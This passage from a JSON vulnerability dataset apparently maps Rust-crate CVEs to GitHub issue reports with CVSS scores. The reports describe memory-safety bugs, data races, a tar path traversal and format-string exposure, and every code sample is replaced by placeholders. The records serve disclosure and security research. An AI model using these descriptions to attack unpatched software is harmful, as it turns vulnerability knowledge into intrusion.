  85640. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85641. "severity": "HIGH",
  85642. "baseScore": 7.5,
  85643. "impactScore": 3.6,
  85644. "exploitabilityScore": 3.9
  85645. },
  85646. {
  85647. "CVE_ID": "CVE-2020-35898",
  85648. "Issue_Url_old": "https://github.com/actix/actix-net/issues/160",
  85649. "Issue_Url_new": "https://github.com/actix/actix-net/issues/160",
  85650. "Repo_new": "actix/actix-net",
  85651. "Issue_Created_At": "2020-07-19T23:36:06Z",
  85652. "description": "Custom Cell implementation is unsound. Right now there is no mechanism in Cell to track whether a mutable reference to the data is already acquired. Thus it is possible to obtain several mutable references to the same memory location by calling APITAG repeatedly: CODETAG This may result in pretty much arbitrary memory corruption, most likely a use after free. Even though no code internal to Actix makes two obvious calls to APITAG in a row, this behavior has been shown to be exploitable from the public API (see APITAG that fails MIRI URLTAG . PR NUMBERTAG has removed one instance of this Cell and all uses of it. However, there is another copy of it in the repository in APITAG crate, and there are NUMBERTAG calls to APITAG . The obvious fix is to replace all uses of custom APITAG with APITAG (the way it was before the introduction of a custom cell in APITAG like it was done in NUMBERTAG",
  85653. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  85654. "severity": "CRITICAL",
  85655. "baseScore": 9.1,
  85656. "impactScore": 5.2,
  85657. "exploitabilityScore": 3.9
  85658. },
  85659. {
  85660. "CVE_ID": "CVE-2020-35874",
  85661. "Issue_Url_old": "https://github.com/droundy/internment/issues/11",
  85662. "Issue_Url_new": "https://github.com/droundy/internment/issues/11",
  85663. "Repo_new": "droundy/internment",
  85664. "Issue_Created_At": "2020-04-24T07:58:21Z",
  85665. "description": "Possible race condition in APITAG .. I believe this function has a potential race condition: URLTAG If a concurrent thread creates a new APITAG with the same value as the one being destroyed after we drop the ref count but before we take the mutex, then removing an entry from the map creates a dangling pointer.",
  85666. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85667. "severity": "HIGH",
  85668. "baseScore": 8.1,
  85669. "impactScore": 5.9,
  85670. "exploitabilityScore": 2.2
  85671. },
  85672. {
  85673. "CVE_ID": "CVE-2020-35885",
  85674. "Issue_Url_old": "https://github.com/pigeonhands/rust-arch/issues/2",
  85675. "Issue_Url_new": "https://github.com/pigeonhands/rust-arch/issues/2",
  85676. "Repo_new": "pigeonhands/rust-arch",
  85677. "Issue_Created_At": "2020-08-20T06:34:53Z",
  85678. "description": "APITAG deallocates a memory region that it doesn't own. URLTAG Description APITAG deallocate a memory region that it doesn't own when APITAG is created without using APITAG . This can introduce memory safety issues such as double free and use after free to client programs. Demonstration Crate: alpm rs Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG d3fb NUMBERTAG a NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
  85679. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85680. "severity": "CRITICAL",
  85681. "baseScore": 9.8,
  85682. "impactScore": 5.9,
  85683. "exploitabilityScore": 3.9
  85684. },
  85685. {
  85686. "CVE_ID": "CVE-2021-29938",
  85687. "Issue_Url_old": "https://github.com/gnzlbg/slice_deque/issues/90",
  85688. "Issue_Url_new": "https://github.com/gnzlbg/slice_deque/issues/90",
  85689. "Repo_new": "gnzlbg/slice_deque",
  85690. "Issue_Created_At": "2021-02-19T07:27:40Z",
  85691. "description": "Panic safety issue in APITAG Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a panic safety issue in the APITAG returned by the APITAG function: URLTAG Notably, the code increments APITAG _before_ it calls APITAG which can potentially panic. This means for example, that it can leave the APITAG in an inconsistent state resulting in a double drop. Here is an example: ERRORTAG This outputs: CODETAG",
  85692. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85693. "severity": "HIGH",
  85694. "baseScore": 7.5,
  85695. "impactScore": 3.6,
  85696. "exploitabilityScore": 3.9
  85697. },
  85698. {
  85699. "CVE_ID": "CVE-2020-35895",
  85700. "Issue_Url_old": "https://github.com/arcnmx/stack-rs/issues/4",
  85701. "Issue_Url_new": "https://github.com/arcnmx/stack-rs/issues/4",
  85702. "Repo_new": "arcnmx/stack-rs",
  85703. "Issue_Created_At": "2020-09-24T09:59:13Z",
  85704. "description": "Missing check in APITAG leads to out of bounds write.. APITAG allows insertion of an element into the array object into the specified index. Due to a missing check on the upperbound of this index, it is possible to write out of bounds. ERRORTAG Issue number NUMBERTAG is pointed out in NUMBERTAG",
  85705. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85706. "severity": "CRITICAL",
  85707. "baseScore": 9.8,
  85708. "impactScore": 5.9,
  85709. "exploitabilityScore": 3.9
  85710. },
  85711. {
  85712. "CVE_ID": "CVE-2020-36472",
  85713. "Issue_Url_old": "https://github.com/edarc/max7301/issues/1",
  85714. "Issue_Url_new": "https://github.com/edarc/max7301/issues/1",
  85715. "Repo_new": "edarc/max7301",
  85716. "Issue_Created_At": "2020-12-19T00:05:47Z",
  85717. "description": "Unsound Sync implementation for APITAG and APITAG . Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG URLTAG APITAG and APITAG implement Sync for APITAG . This bound is seemingly unsound; it allows to send a reference of APITAG or APITAG to another thread, and from there a mutable reference of APITAG can be accessed through APITAG APIs. This could result in a thread safety violation when EI is a non Send type. We suggest to add an APITAG bound (or an equivalent APITAG bound) to those Sync implementations, following the stdlib Mutex's Sync implementation URLTAG .",
  85718. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85719. "severity": "MEDIUM",
  85720. "baseScore": 5.9,
  85721. "impactScore": 3.6,
  85722. "exploitabilityScore": 2.2
  85723. },
  85724. {
  85725. "CVE_ID": "CVE-2018-20996",
  85726. "Issue_Url_old": "https://github.com/crossbeam-rs/crossbeam-epoch/issues/82",
  85727. "Issue_Url_new": "https://github.com/crossbeam-rs/crossbeam-epoch/issues/82",
  85728. "Repo_new": "crossbeam-rs/crossbeam-epoch",
  85729. "Issue_Created_At": "2018-07-25T14:20:11Z",
  85730. "description": "Segfault. I'm not sure exactly which repo this issue belongs in. I just updated to crossbeam NUMBERTAG earlier and am now experiencing segfaults with the following stack trace. Apologies for the lack of pruning: ERRORTAG",
  85731. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85732. "severity": "CRITICAL",
  85733. "baseScore": 9.8,
  85734. "impactScore": 5.9,
  85735. "exploitabilityScore": 3.9
  85736. },
  85737. {
  85738. "CVE_ID": "CVE-2021-28037",
  85739. "Issue_Url_old": "https://github.com/droundy/internment/issues/20",
  85740. "Issue_Url_new": "https://github.com/droundy/internment/issues/20",
  85741. "Repo_new": "droundy/internment",
  85742. "Issue_Created_At": "2021-03-03T20:44:14Z",
  85743. "description": "Intern APITAG : Data race allowed on T. Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description APITAG unconditionally implements Sync . This allows users to create data races on APITAG . Such data races can lead to undefined behavior. URLTAG Reproduction Below is an example program that exhibits undefined behavior (memory corruption) using safe APIs of internment . APITAG Detail APITAG APITAG ERRORTAG Output: APITAG Tested Environment Crate: internment Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG cb NUMBERTAG ad5db NUMBERTAG APITAG APITAG",
  85744. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85745. "severity": "CRITICAL",
  85746. "baseScore": 9.8,
  85747. "impactScore": 5.9,
  85748. "exploitabilityScore": 3.9
  85749. },
  85750. {
  85751. "CVE_ID": "CVE-2021-25907",
  85752. "Issue_Url_old": "https://github.com/strake/containers.rs/issues/2",
  85753. "Issue_Url_new": "https://github.com/strake/containers.rs/issues/2",
  85754. "Repo_new": "strake/containers.rs",
  85755. "Issue_Created_At": "2021-01-12T13:47:29Z",
  85756. "description": "panic safety: double drop may happen within APITAG . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG Functions mutate & APITAG temporarily duplicate the ownership of an item using the given p (and q ). In case the given function f panics, the duplicated item will be dropped twice. Proof of Concept The given program below exhibits a double free error. ERRORTAG Program Output ERRORTAG Thank you for checking out this issue NUMBERTAG",
  85757. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85758. "severity": "CRITICAL",
  85759. "baseScore": 9.8,
  85760. "impactScore": 5.9,
  85761. "exploitabilityScore": 3.9
  85762. },
  85763. {
  85764. "CVE_ID": "CVE-2021-25901",
  85765. "Issue_Url_old": "https://github.com/khuey/lazy-init/issues/9",
  85766. "Issue_Url_new": "https://github.com/khuey/lazy-init/issues/9",
  85767. "Repo_new": "khuey/lazy-init",
  85768. "Issue_Created_At": "2018-05-10T11:04:02Z",
  85769. "description": "potential soundness hole with types that are Sync + APITAG Hi, I believe that the ERRORTAG needs to also require Send. Otherwise it is possible to transfer non Send values between threads. Similar issues in other crates: URLTAG URLTAG CODETAG",
  85770. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  85771. "severity": "MEDIUM",
  85772. "baseScore": 5.3,
  85773. "impactScore": 1.4,
  85774. "exploitabilityScore": 3.9
  85775. },
  85776. {
  85777. "CVE_ID": "CVE-2020-35890",
  85778. "Issue_Url_old": "https://github.com/maciejhirsz/ordnung/issues/8",
  85779. "Issue_Url_new": "https://github.com/maciejhirsz/ordnung/issues/8",
  85780. "Repo_new": "maciejhirsz/ordnung",
  85781. "Issue_Created_At": "2020-09-03T10:08:24Z",
  85782. "description": "Memory safety issues in APITAG . Hello, we have noticed a soundness issue and/or a potential security vulnerability in this crate while performing a security scan on crates.io. Description APITAG contains multiple memory safety issues NUMBERTAG It mishandles large capacity and causes out of bound access in NUMBERTAG bit / allocator layout mismatch in NUMBERTAG bi NUMBERTAG APITAG is not panic safe and causes double free when an index larger than the length is provided. Demonstration Crate: ordnung Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
  85783. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85784. "severity": "HIGH",
  85785. "baseScore": 7.5,
  85786. "impactScore": 3.6,
  85787. "exploitabilityScore": 3.9
  85788. },
  85789. {
  85790. "CVE_ID": "CVE-2020-36217",
  85791. "Issue_Url_old": "https://github.com/Xudong-Huang/may/issues/88",
  85792. "Issue_Url_new": "https://github.com/xudong-huang/may/issues/88",
  85793. "Repo_new": "xudong-huang/may",
  85794. "Issue_Created_At": "2020-11-10T05:37:27Z",
  85795. "description": "Queue needs bounds on its APITAG traits. Currently, it is possible to use APITAG and APITAG to send across types that aren't safe to use in other threads. Due to the guarantee about there only being one popper, I think it should be APITAG when T is Send . Here's a demonstration with a data race using Cells: ERRORTAG which outputs: APITAG APITAG found by Rust group at APITAG gatech)",
  85796. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85797. "severity": "MEDIUM",
  85798. "baseScore": 5.9,
  85799. "impactScore": 3.6,
  85800. "exploitabilityScore": 2.2
  85801. },
  85802. {
  85803. "CVE_ID": "CVE-2019-15544",
  85804. "Issue_Url_old": "https://github.com/stepancheg/rust-protobuf/issues/411",
  85805. "Issue_Url_new": "https://github.com/stepancheg/rust-protobuf/issues/411",
  85806. "Repo_new": "stepancheg/rust-protobuf",
  85807. "Issue_Created_At": "2019-05-14T11:42:31Z",
  85808. "description": "Incorporate OOM fix in next release APITAG Please incorporate commit URLTAG from master in the next release APITAG In particular, please incorporate the following OOM fix: URLTAG URLTAG URLTAG URLTAG We hit this OOM error while fuzzing a project that uses the current release NUMBERTAG Patching NUMBERTAG with the above commit made the error go away. It would be convenient if the commit were incorporated in an official release. Thank you.",
  85809. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85810. "severity": "HIGH",
  85811. "baseScore": 7.5,
  85812. "impactScore": 3.6,
  85813. "exploitabilityScore": 3.9
  85814. },
  85815. {
  85816. "CVE_ID": "CVE-2018-20995",
  85817. "Issue_Url_old": "https://github.com/gnzlbg/slice_deque/issues/57",
  85818. "Issue_Url_new": "https://github.com/gnzlbg/slice_deque/issues/57",
  85819. "Repo_new": "gnzlbg/slice_deque",
  85820. "Issue_Created_At": "2018-12-03T00:43:26Z",
  85821. "description": "APITAG causing memory corruption APITAG This took me a long while to figure out, but I narrowed it down to just a single line: APITAG The elements are simple APITAG structs; the first println outputs the queue in its normal state, whereas in the second all values are like NUMBERTAG or NUMBERTAG This only happens in a quickcheck like test suite where the queue is used super intensively, and pushes/pop are done thousands of times (it constantly fails at the same spot though). I could try running it through valgrind if it helps, not sure how else I could help. Is this a known issue perhaps?",
  85822. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85823. "severity": "CRITICAL",
  85824. "baseScore": 9.8,
  85825. "impactScore": 5.9,
  85826. "exploitabilityScore": 3.9
  85827. },
  85828. {
  85829. "CVE_ID": "CVE-2020-35857",
  85830. "Issue_Url_old": "https://github.com/bluejekyll/trust-dns/issues/980",
  85831. "Issue_Url_new": "https://github.com/bluejekyll/trust-dns/issues/980",
  85832. "Repo_new": "bluejekyll/trust-dns",
  85833. "Issue_Created_At": "2020-01-04T10:07:00Z",
  85834. "description": "thread 'trust dns server runtime' has overflowed its stack. Describe the bug Sometimes the server crashes after few seconds or after a few hours: ERRORTAG ~~To Reproduce~~ Steps to the behavior. Sorry, it doesn't seem reliably reproducible at the moment. I'll add more info, as soon I get more. APITAG Expected behavior No stack overflow. System: OS: Debian Architecture NUMBERTAG ersion: Testing rustc version NUMBERTAG e NUMBERTAG ersion: Crate: trust dns Version NUMBERTAG Additional context ERRORTAG",
  85835. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85836. "severity": "HIGH",
  85837. "baseScore": 7.5,
  85838. "impactScore": 3.6,
  85839. "exploitabilityScore": 3.9
  85840. },
  85841. {
  85842. "CVE_ID": "CVE-2021-28033",
  85843. "Issue_Url_old": "https://github.com/wwylele/byte-struct-rs/issues/1",
  85844. "Issue_Url_new": "https://github.com/wwylele/byte-struct-rs/issues/1",
  85845. "Repo_new": "wwylele/byte-struct-rs",
  85846. "Issue_Created_At": "2021-03-01T18:31:09Z",
  85847. "description": "FILETAG to avoid this problem.",
  85848. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85849. "severity": "CRITICAL",
  85850. "baseScore": 9.8,
  85851. "impactScore": 5.9,
  85852. "exploitabilityScore": 3.9
  85853. },
  85854. {
  85855. "CVE_ID": "CVE-2019-15547",
  85856. "Issue_Url_old": "https://github.com/RustSec/advisory-db/issues/106",
  85857. "Issue_Url_new": "https://github.com/rustsec/advisory-db/issues/106",
  85858. "Repo_new": "rustsec/advisory-db",
  85859. "Issue_Created_At": "2019-06-09T08:04:30Z",
  85860. "description": "Format string vulnerabilities (and more) in multiple safe curses wrapper crates.. I've noticed potentially exploitable security vulnerabilities in the following crates NUMBERTAG which can be triggered by users of these libraries without writing unsafe code. I'm filing an issue rather than a PR since I don't know that I have time to see this through to it's conclusion, especially since multiple crates and several functions are involved. The FAQ [indicates that this is okay URLTAG . pancurses The crate URLTAG exposes the functions APITAG and APITAG as safe functions (I think this is all of them, but could be wrong), despite these passing an arbitrary rust str to into C code which expects to receive a printf style format string. This can lead to a format string vulnerability URLTAG . I filed URLTAG about this, shortly before filing this issue. ncurses The crate URLTAG exposes the functions printw , mvprintw , and mvwprintw as safe functions, which have the same issues described above. In URLTAG I raised this issue about printw (but missed that it wasn't just printw ), which lead to that functions deprecation NUMBERTAG When writing this issue for the advisory db, I noticed the existence of the other two functions. I don't see any other functions accepting format strings (the scanw functions, mercifully, are not exposed). Additionally, while filing this bug, I noticed the following additional vulnerabilities or memory safety issues (I haven't filed issues in the ncurses crate's repository about these): [ instr URLTAG is exposed, which has a buffer overflow (the curses instr function is somewhat similar to the gets function from the C stdlib, in that writes as much text that it wants into a lengthless buffer pointer). Several functions NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG URLTAG write data from the terminal directly into a String's underlying buffer, when the data may not be valid UTF NUMBERTAG I don't know if this can be exploited, but it's a minor memory safety issue nonetheless. I have not done a very thorough look, these are just the most obvious problems to me. Ideally, someone more familiar with the ncurses API would look further NUMBERTAG For total clarity, I didn't look at any others. It seems plausible to me that other Rust curses libs have similar mistakes, since it's a very hard API to use safely. That said, I think these are the most popular ones (not that that makes things any better NUMBERTAG I don't really feel that deprecation is sufficient, as the function is still present (and not ERRORTAG ). Transitive dependency deprecations aren't reported, so rust code consuming this crate transitively could still be at risk. However, if the members of this repository disagree, then one fewer of the ncurses crates functions are problematic in the current release.",
  85861. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  85862. "severity": "HIGH",
  85863. "baseScore": 7.5,
  85864. "impactScore": 3.6,
  85865. "exploitabilityScore": 3.9
  85866. },
  85867. {
  85868. "CVE_ID": "CVE-2019-15547",
  85869. "Issue_Url_old": "https://github.com/jeaye/ncurses-rs/issues/172",
  85870. "Issue_Url_new": "https://github.com/jeaye/ncurses-rs/issues/172",
  85871. "Repo_new": "jeaye/ncurses-rs",
  85872. "Issue_Created_At": "2018-11-27T00:28:15Z",
  85873. "description": "printw should not be exposed.. It's very difficult / impossible to use this function from rust without introducing a format string vulnerability into your code (which can be used to trigger arbitrary code execution). If you must expose something like it, have it just call addstr or mark it as unsafe (and deprecate it in both cases, IMO). See also NUMBERTAG and NUMBERTAG",
  85874. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  85875. "severity": "HIGH",
  85876. "baseScore": 7.5,
  85877. "impactScore": 3.6,
  85878. "exploitabilityScore": 3.9
  85879. },
  85880. {
  85881. "CVE_ID": "CVE-2021-38511",
  85882. "Issue_Url_old": "https://github.com/alexcrichton/tar-rs/issues/238",
  85883. "Issue_Url_new": "https://github.com/alexcrichton/tar-rs/issues/238",
  85884. "Repo_new": "alexcrichton/tar-rs",
  85885. "Issue_Created_At": "2020-09-10T13:27:37Z",
  85886. "description": "unpack_in allows creating directories outside the dst directory. The following code will create the folders exploit and APITAG outside of the demo folder: ERRORTAG ERRORTAG calls APITAG ( APITAG URLTAG on the untrusted path and therefore can create directories outside of the dst directory. APITAG The provided code will fail with the expected error that APITAG is outside of demo , but the parent directories are already created outside of the demo folder. This is kind of related to NUMBERTAG but still works in the current master.",
  85887. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  85888. "severity": "HIGH",
  85889. "baseScore": 7.5,
  85890. "impactScore": 3.6,
  85891. "exploitabilityScore": 3.9
  85892. },
  85893. {
  85894. "CVE_ID": "CVE-2020-36218",
  85895. "Issue_Url_old": "https://github.com/buttplugio/buttplug-rs/issues/225",
  85896. "Issue_Url_new": "https://github.com/buttplugio/buttplug/issues/225",
  85897. "Repo_new": "buttplugio/buttplug",
  85898. "Issue_Created_At": "2020-12-19T01:33:06Z",
  85899. "description": "APITAG allows data race to APITAG objects. Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue ( Describe the bug ) Send / Sync are unconditionally implemented for APITAG , and thus it is possible to cause a data race to a ( APITAG | APITAG ) object. ERRORTAG Proof of Concept ( Actual behavior ) Below is an example program that segfaults while using APITAG . The segfault behavior was observed when the program was built with APITAG in Debug mode, and run on APITAG . The program below allows two threads to concurrently access the same Cell (one thread writes to Cell while the other thread reads from Cell ). ERRORTAG Suggested Solution Adding APITAG bound to the Send impl & APITAG bound to the Sync impl can prevent code like the above to be revoked by the compiler. ERRORTAG Thank you for reviewing this issue :crab:",
  85900. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85901. "severity": "MEDIUM",
  85902. "baseScore": 5.9,
  85903. "impactScore": 3.6,
  85904. "exploitabilityScore": 2.2
  85905. },
  85906. {
  85907. "CVE_ID": "CVE-2021-25905",
  85908. "Issue_Url_old": "https://github.com/Enet4/bra-rs/issues/1",
  85909. "Issue_Url_new": "https://github.com/enet4/bra-rs/issues/1",
  85910. "Repo_new": "enet4/bra-rs",
  85911. "Issue_Created_At": "2021-01-02T17:38:01Z",
  85912. "description": "reading on uninitialized buffer can cause UB ( APITAG ). Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation ( APITAG ). This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. Suggested Fix It is safe to zero initialize the newly allocated APITAG buffer before APITAG , in order to prevent user provided Read from reading old contents of the newly allocated heap memory. The version available on APITAG seems to be different from the latest master branch of this repo, but the same issue exists in APITAG (bra NUMBERTAG Thank you for checking out this issue NUMBERTAG",
  85913. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  85914. "severity": "CRITICAL",
  85915. "baseScore": 9.1,
  85916. "impactScore": 5.2,
  85917. "exploitabilityScore": 3.9
  85918. },
  85919. {
  85920. "CVE_ID": "CVE-2020-36443",
  85921. "Issue_Url_old": "https://github.com/libp2p/rust-libp2p/issues/1932",
  85922. "Issue_Url_new": "https://github.com/libp2p/rust-libp2p/issues/1932",
  85923. "Repo_new": "libp2p/rust-libp2p",
  85924. "Issue_Created_At": "2021-01-24T23:18:34Z",
  85925. "description": "Undefined data exposed in APITAG APITAG implementation. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG 's implementation of APITAG does the following: URLTAG This sets up uninitialized bytes in APITAG and then passes it to the user provided APITAG method. This allows invoking undefined behavior from safe Rust code, reading uninitialized memory. This issue is described a bit in the documentation for FILETAG : > It is your responsibility to make sure that buf is initialized before calling read. Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. Here's an example that outputs uninitialized memory using this: APITAG APITAG to expand APITAG ERRORTAG APITAG",
  85926. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85927. "severity": "CRITICAL",
  85928. "baseScore": 9.8,
  85929. "impactScore": 5.9,
  85930. "exploitabilityScore": 3.9
  85931. },
  85932. {
  85933. "CVE_ID": "CVE-2020-35902",
  85934. "Issue_Url_old": "https://github.com/actix/actix-net/issues/91",
  85935. "Issue_Url_new": "https://github.com/actix/actix-net/issues/91",
  85936. "Repo_new": "actix/actix-net",
  85937. "Issue_Created_At": "2020-01-30T14:27:19Z",
  85938. "description": "UB due to unsafe pinning in actix codec. The following code segfaults, due to incorrect pinning in Framed . ERRORTAG",
  85939. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85940. "severity": "CRITICAL",
  85941. "baseScore": 9.8,
  85942. "impactScore": 5.9,
  85943. "exploitabilityScore": 3.9
  85944. },
  85945. {
  85946. "CVE_ID": "CVE-2021-25908",
  85947. "Issue_Url_old": "https://github.com/cogciprocate/ocl/issues/194",
  85948. "Issue_Url_new": "https://github.com/cogciprocate/ocl/issues/194",
  85949. "Repo_new": "cogciprocate/ocl",
  85950. "Issue_Created_At": "2021-01-04T13:06:37Z",
  85951. "description": "double drop may happen upon panic in APITAG . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description We found NUMBERTAG cases (below) where a double drop of an objects can happen if a panic occurs within the user provided APITAG implementation. URLTAG URLTAG Proof of Concept The example program below exhibits a double drop. ERRORTAG Suggested Fix In this case, using APITAG can help guard against the potential panic within APITAG . I'll submit a PR with the suggested fix right away. Thank you for checking out this issue NUMBERTAG",
  85952. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85953. "severity": "HIGH",
  85954. "baseScore": 7.5,
  85955. "impactScore": 3.6,
  85956. "exploitabilityScore": 3.9
  85957. },
  85958. {
  85959. "CVE_ID": "CVE-2020-35894",
  85960. "Issue_Url_old": "https://github.com/petertodd/rust-obstack/issues/4",
  85961. "Issue_Url_new": "https://github.com/petertodd/rust-obstack/issues/4",
  85962. "Repo_new": "petertodd/rust-obstack",
  85963. "Issue_Created_At": "2020-09-03T06:27:05Z",
  85964. "description": "Obstack generates unaligned references. URLTAG Description Obstack generates unaligned references for types that require a large alignment. Demonstration Crate: obstack Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG Cargo flags: release ERRORTAG Output: CODETAG Return Code NUMBERTAG",
  85965. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  85966. "severity": "HIGH",
  85967. "baseScore": 7.5,
  85968. "impactScore": 3.6,
  85969. "exploitabilityScore": 3.9
  85970. },
  85971. {
  85972. "CVE_ID": "CVE-2020-36204",
  85973. "Issue_Url_old": "https://github.com/bodil/im-rs/issues/157",
  85974. "Issue_Url_new": "https://github.com/bodil/im-rs/issues/157",
  85975. "Repo_new": "bodil/im-rs",
  85976. "Issue_Created_At": "2020-11-09T07:14:37Z",
  85977. "description": "APITAG lacks bounds on its Send and Sync traits. It looks like the version of Focus for RRB tree backed vectors, APITAG lacks bounds for Sync and Send : URLTAG I realize APITAG is an implementation detail and not really meant to be used by end users of the library but I think this opens up the possibility of causing data races through safe Rust code like this: ERRORTAG which outputs APITAG APITAG found by the Rust group at APITAG gatech)",
  85978. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  85979. "severity": "MEDIUM",
  85980. "baseScore": 4.7,
  85981. "impactScore": 3.6,
  85982. "exploitabilityScore": 1.0
  85983. },
  85984. {
  85985. "CVE_ID": "CVE-2021-26308",
  85986. "Issue_Url_old": "https://github.com/blackbeam/rust-marc/issues/7",
  85987. "Issue_Url_new": "https://github.com/blackbeam/rust-marc/issues/7",
  85988. "Repo_new": "blackbeam/rust-marc",
  85989. "Issue_Created_At": "2021-01-27T04:02:42Z",
  85990. "description": "Record::read : Custom Read on uninitialized buffer may cause UB. Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG FILETAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. Another question I have regarding APITAG : Right before APITAG , why APITAG instead of APITAG ? At the momment it seems unsound to me :( How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Jan NUMBERTAG there is not yet an ideal fix that works in stable Rust with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Well written document regarding the issue URLTAG Rust RFC NUMBERTAG URLTAG FILETAG Discussion in Rust Internals Forum URLTAG",
  85991. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85992. "severity": "HIGH",
  85993. "baseScore": 7.5,
  85994. "impactScore": 3.6,
  85995. "exploitabilityScore": 3.9
  85996. },
  85997. {
  85998. "CVE_ID": "CVE-2021-29932",
  85999. "Issue_Url_old": "https://github.com/zeta12ti/parse_duration/issues/21",
  86000. "Issue_Url_new": "https://github.com/zeta12ti/parse_duration/issues/21",
  86001. "Repo_new": "zeta12ti/parse_duration",
  86002. "Issue_Created_At": "2021-03-18T14:59:54Z",
  86003. "description": "Denial of service through malicious payloads. Hey, As reported in URLTAG there are payloads that makes the APITAG to cause denial of service through big integer pow calculations. I am not sure if the suggested solution is the best one, maybe there should be a way to specify the exponent limit or whether we accept an exponent at all in the duration string. Since the repo didn't have any commit for a ~year, MENTIONTAG are you going to fix it?",
  86004. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86005. "severity": "HIGH",
  86006. "baseScore": 7.5,
  86007. "impactScore": 3.6,
  86008. "exploitabilityScore": 3.9
  86009. },
  86010. {
  86011. "CVE_ID": "CVE-2020-36467",
  86012. "Issue_Url_old": "https://github.com/playXE/cgc/issues/5",
  86013. "Issue_Url_new": "https://github.com/playxe/cgc/issues/5",
  86014. "Repo_new": "playxe/cgc",
  86015. "Issue_Created_At": "2020-12-10T08:24:12Z",
